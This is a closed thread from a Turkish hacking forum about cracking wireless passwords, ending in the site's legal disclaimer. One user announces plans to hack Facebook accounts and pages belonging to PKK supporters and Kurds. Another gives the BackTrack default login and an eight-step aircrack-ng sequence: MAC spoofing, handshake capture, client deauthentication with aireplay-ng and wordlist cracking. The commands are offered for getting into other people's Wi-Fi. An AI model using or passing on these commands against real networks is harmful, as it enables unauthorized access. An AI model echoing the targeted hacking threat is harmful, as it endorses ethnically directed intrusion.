%100 wireless şifre kırıcı Ms Dost

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

kaanuysal

Yeni üye
1 Eyl 2007
4
0

4rcturus

Yeni üye
1 Mar 2012
1
0
Bursa
Bursalı HACKER

Arkadaşlar Bursalı Hacker Hack'e Geri dönmüştür Bilgilerinize Gencturk16'idi Kod adı Şimdi....

Kod adını Bılıyorum 1 sene Icınde Facebook Paylasım Sıtesınde Pkk ve Kürtlere Ait Hesab ve Sayfaları Hackleyecektir.

Hacktivist.

6 Ocak 2012
78
0
ankara
beyler olayı çözdüm sistem aynı wrld listden şifre kırmayı deniyor
indirdiğimiz dosya backtrack gibi bişe backtrackı xp formatlama olayı gibi bilgisayarı boot ediyosunuz
boot ettikten sonra
root yazıyosunuz bidaha biley girmenizi istiycek ona da toor yazıyosunuz
giriliyor bundan sonra sorasıyla komutları yazıyoruz ve videodaki gibi yapıyoruz

Wireless Şifre Kırma KESİN - YouTube

buda backtracka girilecek komutlar:

1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger --mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (dosya adı) --bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid)wlan0
8)aircrack-ng (dosyaadı-01.cap)-w (wordlistin yeri)

ve şifre elimizde yarın sabah yöntemi deniyecem sonucu yazarım

tmmda kardes back tracın değişik versiyonları var ben şuan 5i kullanıyorum ve kodlar değişik bi anlatabilirmisin biliyorsan

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.